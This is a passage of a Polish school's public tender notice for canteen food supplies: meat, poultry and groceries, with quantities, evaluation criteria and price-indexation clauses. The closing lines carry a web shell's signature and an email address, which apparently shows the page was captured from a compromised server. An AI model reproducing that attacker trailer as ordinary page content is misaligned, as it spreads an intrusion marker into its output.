wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa mięsa wieprzowego i drobiowego do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1	Kark wp b/k kl.1	300	kg<br/>2	Łopatka b/k	150	kg<br/>3	Polędwiczka wieprzowa	350	kg<br/>4	Schab wp b/k	450	kg<br/>5	Słonina bez skóry	40	kg<br/>6	Szynka surowa wp z/k bez skóry i biodrówki kl. 1	860	kg<br/>7	Żeberka wp paski, trójkąty	600	kg<br/>8	Filet z indyka b/s i b/k	450	kg<br/>9	Filet z kurczaka b/s i b/k	650	kg<br/>10	Kurczak świeży	450	kg<br/>11	Udko z kurczaka	400	kg<br/>12	Dramstik z kurczaka	200	kg<br/>13	Skrzydło z indyka	350	kg<br/>14	Szyja z indyka	250	kg<br/>15	Rostbef wołowy b/k kl.1 150	kg<br/>16	Szponder wołowy b/k	150	kg<br/>17	Kiełbasa wiejska 80	kg<br/>18	Kiełbasa zwyczajna 80	kg<br/>19	Parówki z szynki op. 5 szt.	500	szt.<br/>20	Podgardle wędzone 20	kg<br/>21	Boczek wędzony	45	kg<br/>22	Indyk z pasieki	40	kg<br/>23	Sopocka tradycyjna 80	kg<br/>24	Kiełbasa krakowska	80	kg<br/>25	Szynka wiejska	80	kg<br/>26	Indyk z Bobrownik 80	kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 6.00÷9.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa pozostałych artykułów spożywczych do stołówki szkolnej Szkoły Podstawowej im. 100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1.	Ananasy w syropie	60	szt.<br/>2.	Bazylia 1	kg<br/>3.	Biszkopty bezcukrowe	50	szt.<br/>4.	Brzoskwinie w syropie	160	szt.<br/>5.	Buraczki konserwowe 800g	50	szt.<br/>6.	Chrupki kukurydziane 85g	100	szt.<br/>7.	Chrupki kukurydziane pałeczki 50g	100	szt.<br/>8.	Chrzan tarty	100	szt.<br/>9.	Cukier kryształ	800	kg<br/>10.	Cukier puder	100	kg<br/>11.	Curry	40	szt.<br/>12.	Cynamon 3	kg<br/>13.	Czekolada	120	szt.<br/>14.	Czosnek granulowany 3	kg<br/>15.	Dżem niskosłodzony 280g	500	szt.<br/>16.	Ekstrakt naturalny wanilia 30 ml	20	szt.<br/>17.	Gałka muszkatołowa	20	szt.<br/>18.	Groszek ptysiowy 125g	400	szt.<br/>19.	Groszek zielony konserwowy	100	szt.<br/>20.	Herbata expressowa	50	szt.<br/>21.	Herbata owocowa	2000	szt.<br/>22.	Herbatniki pełnoziarniste min 300g	250	szt.<br/>23.	Herbatniki szkolne 50g	300 szt.<br/>24.	Jaja świeże rozmiar L	7000	szt.<br/>25.	Imbir	20	szt.<br/>26.	Kakao naturalne 150g	140	szt.<br/>27.	Kasza bulgur	100	kg<br/>28.	Kasza gryczana	10	kg<br/>29.	Kasza jaglana	80	kg<br/>30.	Kasza jęczmienna	100	kg<br/>31.	Kasza kukurydziana	40	kg<br/>32.	Kasza kuskus	100	kg<br/>33.	Kasza manna	60	kg<br/>34.	Kasza pęczak	60	kg<br/>35.	Kawa zbożowa, bezkofeinowa	140	szt.<br/>36.	Ketchup 480g	100	szt.<br/>37.	Kminek cały	30	szt.<br/>38.	Kminek mielony 4	kg<br/>39.	Koncentrat pomidorowy 950 - 1000g	80	szt.<br/>40.	Kukurydza konserwowa	200	szt.<br/>41.	Liść laurowy 100g	5	szt.<br/>42.	Majeranek suszony 200g	6	szt.<br/>43.	Majonez 700g	100	szt.<br/>44.	Makaron różne kształty	700	kg<br/>45.	Makaron różne kształty razowy	70	kg<br/>46.	Mąka pszenna	500	kg<br/>47.	Mąka ziemniaczana	45	kg<br/>48.	Miód 1400g	75	szt.<br/>49.	Mleczko kokosowe	30	szt.<br/>50.	Morele suszone	50	szt.<br/>51.	Mus owocowy/warzywny/z dodatkiem płatków zb.	3500	szt.<br/>52.	Musztarda	60	szt.<br/>53.	Napój owsiany 1l	250	szt.<br/>54.	Ocet	20	szt.<br/>55.	Ogórki konserwowe 1700ml	50	szt.<br/>56.	Olej roślinny	400	litry<br/>57.	Olej roślinny z ziołami i warzywami	30	szt.<br/>58.	Oliwa z oliwek 1 l	30	szt.<br/>59.	Oliwki zielone i czarne 0,9l - cała / krojona	20	szt.<br/>60.	Oregano 200g	6	szt.<br/>61.	Panierka Panko 1kg	10	szt.<br/>62.	Papryka czerwona słodka wędzona 8	kg<br/>63.	Papryka słodka mielona czerwona 12 kg<br/>64.	Pieprz cytrynowy 20g	80	szt.<br/>65.	Pieprz czarny mielony	6	kg<br/>66.	Pieprz ziołowy 20g	60	szt.<br/>67.	Płatki czekoladowe 70	kg<br/>68.	Płatki kukurydziane	70	kg<br/>69.	Płatki zbożowe	100	kg<br/>70.	Podpłomyk 150	szt.<br/>71.	Pomidory krojone bez skórki 2500ml	80	szt.<br/>72.	Pomidory suszone 250g - słoik	80	szt.<br/>73.	Pulpa pomidorowa 4kg	30	szt.<br/>74.	Powidło śliwkowe 290 g	100	szt.<br/>75.	Przyprawa uniwersalna 150g	300	szt.<br/>76.	Rodzynki 30	kg<br/>77.	Rozmaryn	20	szt.<br/>78.	Ryż basmati 50	kg<br/>79.	Ryż biały długoziarnisty, brązowy	150	kg<br/>80.	Ryż biały paraboliczny	150	kg<br/>81.	Sałatka szwedzka 0,9l	80	szt.<br/>82.	Sałatka z czerwonej kapusty	220	szt.<br/>83.	Seler konserwowy 0,9l	20	szt.<br/>84.	Słonecznik łuskany	4	kg<br/>85.	Soczek 200ml karton	1200	szt.<br/>86.	Sól kamienna jodowana	220	kg<br/>87.	Śliwka kalifornijska	5	kg<br/>88.	Tymianek 10g	40	szt.<br/>89.	Wafle ryżowe	90	szt.<br/>90.	Wafle tortowe niskocukrowe	50	szt.<br/>91.	Woda mineralna	2500	szt.<br/>92.	Ziele angielskie 15g	60	szt.<br/>93.	Zioła prowansalskie	30	szt.<br/>94.	Żurawina 20	kg<br/>95.	Żurek na wodzie źródlanej	210	szt.<br/>96.	Łuskane pestki dyni	5	kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 7.00 ÷ 10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15330000-0 - Przetworzone owoce i warzywa</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15830000-5 - Cukier i produkty pokrewne</p> <p class="mb-0">15860000-4 - Kawa, herbata i podobne produkty</p> <p class="mb-0">15840000-8 - Kakao; czekolada i wyroby cukiernicze</p> <p class="mb-0">15410000-5 - Surowe oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15610000-7 - Produkty przemiału ziarna</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oferta złożona przez spółkę cywilną traktowana jest jako oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość dokonania zmiany w zakresie:<br/>a) urzędowej zmiany stawki podatku od towarów i usług (VAT), jeżeli zmiana stawki podatku od towarów i usług (VAT) powodować będzie zwiększenie lub zmniejszenie należnego wynagrodzenia Wykonawcy z umowy, (kosztów umowy po stronie Wykonawcy), Zamawiający dopuszcza zwiększenie lub zmniejszenie wynagrodzenia o kwotę równą różnicy w kwocie podatku naliczonego przez Wykonawcę;<br/>b) zmiany nazwy, adresu, formy organizacyjno - prawnej itp. którejkolwiek ze stron;<br/>c) sytuacji, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tj. nieodnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona.<br/>2. Strony, zgodnie z przepisem art. 439 Pzp, przewidują także możliwość zmiany wysokości wynagrodzenia umownego – waloryzacji wynagrodzenia w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia tj. z uwagi na okoliczności wskazane w ust 3. Waloryzacja, o której mowa w niniejszym ust. jest możliwa po upływie 6 miesięcy od daty zawarcia umowy.<br/>3. Podstawą dla zastosowania zmiany wynagrodzenia jest zmiana kosztów związanych z realizacją zamówienia w wymiarze co najmniej 6 % w stosunku do ceny z dnia zawarcia umowy lub ceny z dnia złożenia oferty, jeżeli pomiędzy złożeniem oferty a podpisaniem umowy minęło 180 dni –wyliczana poprzez wskaźnik inflacji.<br/>4. Wskaźnik inflacji – Wi będzie wyliczany poprzez przemnożenia przez siebie wskaźników cen towarów i usług konsumpcyjnych (w ujęciu miesięcznym) dla kolejnych miesięcy począwszy od następnego miesiąca, w którym nastąpiło zawarcie umowy lub złożenie oferty, jeżeli pomiędzy złożeniem oferty a podpisaniem umowy minęło 180 dni do miesiąca poprzedniego za który nastąpi wystawienie faktury (miesiąc n-ty) wg poniższego wzoru:<br/><br/>Wi(n)=W1/100 x W2/100 x W3/100 x…x (Wn-1)/100 x Wn/100 <br/>Gdzie<br/>Wi = wskaźnik inflacji<br/>(Wi=1,06 oznacza wzrost kosztów o 6%, a Wi=0,94 oznacza obniżenie kosztów o 6%)<br/>W1, W2, W3…= wskaźniki cen towarów i usług konsumpcyjnych z kolejnych miesięcy po podpisaniu umowy lub złożeniu oferty, jeżeli pomiędzy złożeniem oferty a podpisaniem umowy minęło 180 dni (miesięczne wskaźniki w układzie miesiąc poprzedni = 100)<br/>Wskaźniki W1, W2….. udostępniane są w pliku na stronie https://stat.gov.pl/wskazniki- makroekonomiczne/ <br/>W przypadku, gdyby w/w wskaźnik przestał być́ dostępny, strony uzgodnią̨ inny, najbardziej zbliżony wskaźnik publikowany przez GUS.<br/><br/>5. Waloryzacja będzie odbywać się poprzez przemnożenie należnego wynagrodzenia za każdy produkt przez wskaźnik waloryzacji. Wskaźnik waloryzacji 𝑊𝑤(𝑛) = 0,5 + 0,5 𝑊𝑖 (𝑛)<br/>Zwiększone zostanie również proporcjonalnie wynagrodzenie umowne.<br/><br/>6. Waloryzacja może uwzględniać zarówno zwiększenie jak i zmniejszenie nierozliczonego jeszcze wynagrodzenia umownego. Wysokość wynagrodzenia może być podwyższana lub obniżana po złożeniu przez jedną ze stron oświadczenia wskazującego na procentowy wzrost/spadek wynagrodzenia, zgodnie z ust. 4 oraz po podpisaniu przez obie Strony aneksu w formie pisemnej pod rygorem nieważności.<br/>7. Łączna wartość korekt wynikająca z waloryzacji nie przekroczy (+/-) 10% wynagrodzenia brutto, o którym mowa w § 3 ust. 1 Umowy. Przez łączną wartość korekt, o której mowa należy rozumieć wartość wzrostu lub spadku wynagrodzenia brutto Wykonawcy wynikającą z waloryzacji. Postanowienia umowne w zakresie waloryzacji stosuje się do zakończenia niniejszej Umowy.<br/>8. Waloryzacji nie podlegają faktury obejmujące dostawy dodatkowe.<br/>9. Postanowień umownych w zakresie waloryzacji nie stosuje się od chwili osiągnięcia limitu, o którym mowa w ust. 7. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-10 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2026-01-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com